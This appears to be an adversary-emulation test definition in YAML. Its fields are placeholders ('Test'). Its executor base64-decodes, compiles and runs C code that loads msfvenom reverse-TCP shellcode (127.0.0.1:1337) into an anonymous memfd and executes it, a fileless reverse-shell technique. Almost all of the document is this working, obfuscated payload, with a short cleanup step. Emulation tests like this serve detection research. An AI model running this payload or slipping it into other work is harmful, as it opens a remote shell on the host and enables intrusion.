attack_technique: Test
display_name: MEMFD.EXEC
atomic_tests:
- name: Test
  description: Test
  supported_platforms:
    - linux
    - containers
  input_arguments:
    Temporary Filename:
      description: Full path to use for the test file
      type: Path
      default: /tmp/test_temporary
  executor:
    command: |
      echo I2RlZmluZSBfR05VX1NPVVJDRQoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvbW1hbi5oPgojaW5jbHVkZSA8bGludXgvbWVtZmQuaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgoKLy8gbXNmdmVub20gLXAgbGludXgveDY0L3NoZWxsX3JldmVyc2VfdGNwIExIT1NUPTEyNy4wLjAuMSBMUE9SVD0xMzM3IC1mIGVsZgpjb25zdCBjaGFyIGVsZltdID0gewogICAgMHg3ZiwgMHg0NSwgMHg0YywgMHg0NiwgMHgyLCAweDEsIDB4MSwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgyLCAweDAsIDB4M2UsIDB4MCwgMHgxLCAweDAsIDB4MCwgMHgwLCAweDc4LCAweDAsIDB4NDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDQwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4NDAsIDB4MCwgMHgzOCwgMHgwLCAweDEsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgxLCAweDAsIDB4MCwgMHgwLCAweDcsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHg0MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDQwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHhjMiwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweGMsIDB4MSwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDEwLCAweDAsIDB4MCwgMHgwLCAweDAsIDB4MCwgMHgwLCAweDZhLCAweDI5LCAweDU4LCAweDk5LCAweDZhLCAweDIsIDB4NWYsIDB4NmEsIDB4MSwgMHg1ZSwgMHhmLCAweDUsIDB4NDgsIDB4OTcsIDB4NDgsIDB4YjksIDB4MiwgMHgwLCAweDUsIDB4MzksIDB4N2YsIDB4MCwgMHgwLCAweDEsIDB4NTEsIDB4NDgsIDB4ODksIDB4ZTYsIDB4NmEsIDB4MTAsIDB4NWEsIDB4NmEsIDB4MmEsIDB4NTgsIDB4ZiwgMHg1LCAweDZhLCAweDMsIDB4NWUsIDB4NDgsIDB4ZmYsIDB4Y2UsIDB4NmEsIDB4MjEsIDB4NTgsIDB4ZiwgMHg1LCAweDc1LCAweGY2LCAweDZhLCAweDNiLCAweDU4LCAweDk5LCAweDQ4LCAweGJiLCAweDJmLCAweDYyLCAweDY5LCAweDZlLCAweDJmLCAweDczLCAweDY4LCAweDAsIDB4NTMsIDB4NDgsIDB4ODksIDB4ZTcsIDB4NTIsIDB4NTcsIDB4NDgsIDB4ODksIDB4ZTYsIDB4ZiwgMHg1Cn07CgppbnQgbWFpbigpCnsKICAgIGludCBmZDsKICAgIGNoYXIgcGF0aFsxMDBdOwogICAgY2hhciAqKmFyZ3YgPSB7IE5VTEwgfTsKICAgIGNoYXIgKiplbnZwID0geyBOVUxMIH07CgogICAgZmQgPSBtZW1mZF9jcmVhdGUoIm1lbWZkX2ZpbGUiLCBNRkRfQ0xPRVhFQyk7CiAgICBpZiAoZmQgPCAwKQogICAgewogICAgICAgIHBlcnJvcigibWVtZmRfY3JlYXRlIik7CiAgICAgICAgZXhpdCgxKTsKICAgIH0KCiAgICB3cml0ZShmZCwgZWxmLCBzaXplb2YoZWxmKSk7CgogICAgc25wcmludGYocGF0aCwgc2l6ZW9mKHBhdGgpLCAiL3Byb2Mvc2VsZi9mZC8lZCIsIGZkKTsKICAgIGlmIChleGVjdmUocGF0aCwgYXJndiwgZW52cCkgPCAwKQogICAgewogICAgICAgIHBlcnJvcigiZXhlY3ZlIik7CiAgICAgICAgZXhpdCgxKTsKICAgIH0KCiAgICByZXR1cm4gMDsKfQo= | base64 -d > "#{Temporary Filename}".c
      gcc "#{Temporary Filename}".c -w -o "#{Temporary Filename}"
      /bin/sh -c "#{Temporary Filename}"
    cleanup_command: |
      rm "#{Temporary Filename}".c
      rm "#{Temporary Filename}"
    name: bash
    elevation_required: false
